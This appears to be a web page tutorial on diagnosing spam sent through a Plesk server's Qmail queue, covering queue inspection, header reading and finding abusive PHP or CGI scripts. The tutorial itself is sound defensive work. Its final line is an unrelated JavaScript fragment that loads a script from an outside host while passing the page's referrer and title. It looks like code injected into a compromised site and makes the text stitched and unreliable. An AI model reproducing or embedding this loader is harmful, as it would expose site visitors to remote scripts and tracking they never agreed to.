If you feel emails are saturated in the Plesk Qmail mail queue, there is a possibility that your Plesk server is been used for sending spam emails.
On a Plesk server relaying is not allowed by default so following are the ways spamming is mostly done. They are explained below point wise.
1) Using CGI by a user
2) PHP scripts.
3) By a compromised email account
First, lets look at the the mail queue
# /var/qmail/bin/qmail-qstat messages in queue: 22507 messages in queue but not yet preprocessed: 0
As you can see above, there are a large amount of emails in the mail queue. The source of these emails could either be a PHP/CGI script OR an authorized email account on the server.
Let’s start with reading the message headers with ‘qmail-qread’
# /var/qmail/bin/qmail-qread 5 Nov 2012 11:50:17 GMT #768752 1231 remote user1@domain1.com remote user2@domain1.com remote user1@domain2.com
This will list the sender and recipient of all the emails in the mail queue.
In the above example #768752 is the message ID, now find out the location of this email to read the complete header
# find /var/qmail/queue/mess/ -name 768752 /var/qmail/queue/mess/0/768752
Above is the complete path to the mail file, now open the file and look for the “Received” line.
# cat /var/qmail/queue/mess/0/768752 | more
The “Received” line indicates from where the message was received OR invoked.
1) If the message is sent via CGI by a user, it will display the UID of the user as below:
Received: (qmail 26193 invoked by uid 10001); 5 Nov 2012 11:50:17
Now, search the UID 10001 in the passwd file to find the domain name
# grep 10001 /etc/passwd
This will display the domain name the UID 10001 belongs to.
2) The “Received” line indicates the UID of user Apache (i.e. 48) if email is sent via a PHP script
Received: (qmail 26193 invoked by uid 48); 5 Nov 2012 11:50:17 +000
In such a case, you have to monitor the PHP scripts in real-time i.e. scripts that are running when emails are been sent.
Execute the below command as it is when the mail queue is growing rapidly
# lsof +r 1 -p `ps axww | grep httpd | grep -v grep | \
awk ' { if(!str) { str=$1 } else { str=str","$1}}END{print str}'` \
| grep vhosts | grep php
3) Many a time email accounts are compromised and used for sending bulk/spam emails from other locations. In such a case, “Received” line contains “invoked from network”
Received: (qmail 26193 invoked from network); 5 Nov 2012 11:50:17
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;